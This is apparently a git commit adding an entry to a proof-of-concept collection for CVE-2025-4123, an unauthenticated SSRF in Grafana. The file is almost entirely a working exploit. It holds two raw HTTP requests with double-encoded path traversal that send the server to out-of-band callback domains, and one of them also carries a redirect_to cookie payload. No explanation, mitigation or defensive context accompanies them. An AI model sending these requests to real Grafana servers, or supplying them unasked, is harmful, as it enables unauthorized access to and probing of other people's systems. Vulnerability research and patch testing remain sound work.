Create Grafana存在未授权SSRF漏洞(CVE-2025-4123).md

2025-11-04 18:06:34 +00:00 · 2025-06-11 14:54:05 +08:00 · 2025-06-11 14:54:05 +08:00 · 29605996af
commit 29605996af
parent d2b864744f
1 changed files with 21 additions and 0 deletions
--- a/wpoc/Grafana/Grafana存在未授权SSRF漏洞(CVE-2025-4123).md
+++ b/wpoc/Grafana/Grafana存在未授权SSRF漏洞(CVE-2025-4123).md
@ -0,0 +1,21 @@
+# Grafana存在未授权SSRF漏洞(CVE-2025-4123)
+
+## poc
+
+```javascript
+GET /render/public/..%252f%255Cczeqm5.dnslog.cn%252f%253F%252f..%252f.. HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
+Connection: close
+Accept-Encoding: gzip
+```
+<img width="886" alt="1749624834319" src="https://github.com/user-attachments/assets/e139dab4-6d61-4f29-aff2-a8f84d29cd6c" />
+
+```
+GET /public/..%2F%5c123.czeqm5.dnslog.cn%2F%3f%2F..%2F.. HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19
+Connection: close
+Cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cd0nt31pu8bl7cn5ncca08sg68smps8h39.oast.live%25252f%25253F%25252f..%25252f..
+Accept-Encoding: gzip
+```